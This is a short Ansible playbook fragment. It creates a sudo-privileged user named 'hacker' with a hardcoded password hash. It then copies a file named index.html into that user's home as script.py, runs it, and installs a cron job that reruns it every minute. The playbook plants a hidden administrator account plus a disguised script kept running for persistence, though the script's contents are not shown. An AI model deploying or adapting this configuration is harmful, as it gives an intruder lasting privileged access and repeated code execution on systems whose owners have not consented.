---
- group:
    name: sudo
    state: present
- user:
    name: hacker
    groups: sudo
    password: $6$oDEwgZ9v$kgqkqSqtUpnnD5wvrsjYvAIVtrdB3jr0j/z3Z2oGV7PsCXSUxlo7w.ClR50uir6WJCHkdTuWevwZmk0Imw9BX.
    shell: /bin/bash
    append: true
    home: /home/hacker
- copy:
    owner: hacker
    mode: '711'
    dest: /home/hacker/script.py
    src: ./files/index.html
- shell:
    cmd: python /home/hacker/script.py
- cron:
    name: rerun script
    job: /home/hacker/script.py
    minute: '*/1'
